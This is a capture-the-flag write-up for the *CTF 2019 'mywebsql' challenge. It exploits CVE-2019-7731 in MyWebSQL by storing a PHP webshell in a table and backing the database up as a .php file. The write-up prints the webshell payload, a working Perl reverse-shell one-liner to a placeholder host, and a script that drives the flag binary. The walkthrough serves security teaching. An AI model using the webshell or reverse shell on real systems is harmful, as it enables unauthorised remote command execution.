*CTF 2019 - Write-up

Wednesday 1 May 2019 (2019-05-01)

Saturday 14 September 2024 (2024-09-14)

noraj (Alexandre ZANNI)

CVE, ctf, perl, rce, security, sql, webshell, writeups

🇬🇧

Information#

CTF#

Name : *CTF 2019
Website : wpictf.xyz
Type : Online
Format : Jeopardy
CTF Time : link

mywebsql - Web#

http://34.92.36.201:10080/

OSINT#

Let's find intel about MyWebSQL. We can look for:

MyWebSQL 3.7 Backup Archive File Remote Code Execution
CVE-2019-7731 exploit

And finally I found some links:

CVE found by 0xUhaw and his colleagues (including CVE-2019-7731): https://github.com/0xUhaw/CVE-Bins
CVE-2019-7731 description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7731
CVE-2019-7731 write-up and PoC: https://github.com/eddietcc/CVEnotes/blob/master/MyWebSQL/RCE/readme.md

Exploit#

Now that I found the PoC of CVE-2019-7731, let's exploit it:

Login the WebUI with admin/admin.
Created a table noraj
Created an entry with value <?php system($_GET[cmd]); ?>
Used the Backup Database feature and rename the backup file to noraj.php
Go to http://34.92.36.201:10080/backups/noraj.php?cmd=id and execute commands in our fresh webshell

Read the flag#

Let's try cmd=/readflag | base64

$ printf %s 'U29sdmUgdGhlIGVhc3kgY2hhbGxlbmdlIGZpcnN0CigoKCgoLTk4OTczMyktKC0zNjMxMjEpKS0oLTI3OTQwMSkpKygyNTE2MjApKS0oLTUxNzMyOSkpCmlucHV0IHlvdXIgYW5zd2VyOiBjYWxjdWxhdGUgZXJyb3IhCg==' | base64 -d
Solve the easy challenge first
(((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
input your answer: calculate error!
$ irb
irb(main):001:0> (((((-989733)-(-363121))-(-279401))+(251620))-(-517329))
=> 421738

But the binary that read the flag seems to require interactivity. It is reading the protected /flag.

Let's get the binary locally: cmd=cat /readflag | base64 | tr -d "\n".

Even if not required I managed to get a reverse shell with perl:

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Then my mate 0xUKN remembered a CTF challenge that was similar (interact with a binary from a non-interactive shell).

It was the l33t-hoster challenge from Insomni'hack teaser 2019.

As there is perl of the server and that my perl reverse shell worked fine, I choose to re-use the solution from the CTF team GoN (https://github.com/mdsnins/ctf-writeups/blob/master/2019/Insomnihack 2019/l33t-hoster/l33t-hoster.md) that used a perl script to interact with the binary I/O.

I first tried to inline it and execute it as a one-liner with perl -e.

perl -e 'use warnings;use strict;use IPC::Open2;$| = 1;chdir "/";my $pid = open2(\*out2, \*in2, "/readflag") or die;my $reply = <out2>;print STDOUT $reply;$reply = <out2>;print STDOUT $reply;my $answer = eval($reply);print STDOUT "answer: $answer\n"; print in2 " $answer ";in2->flush();$reply = <out2>;print STDOUT $reply;'

This was working but the flag was not printed because it was outputted to STDERR rather than STDOUT.

So I wrote the perl script in a file and executed the script redirecting STDERR to STDOUT:

$ printf %s 'use warnings;use strict;use IPC::Open2;$| = 1;chdir "/";my $pid = open2(\*out2, \*in2, "/readflag") or die;my $reply = <out2>;print STDOUT $reply;$reply = <out2>;print STDOUT $reply;my $answer = eval($reply);print STDOUT "answer: $answer\n"; print in2 " $answer ";in2->flush();$reply = <out2>;print STDOUT $reply;' > noraj.pl
$ perl noraj.pl > s3 2>&1
$ cat s3
*CTF{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}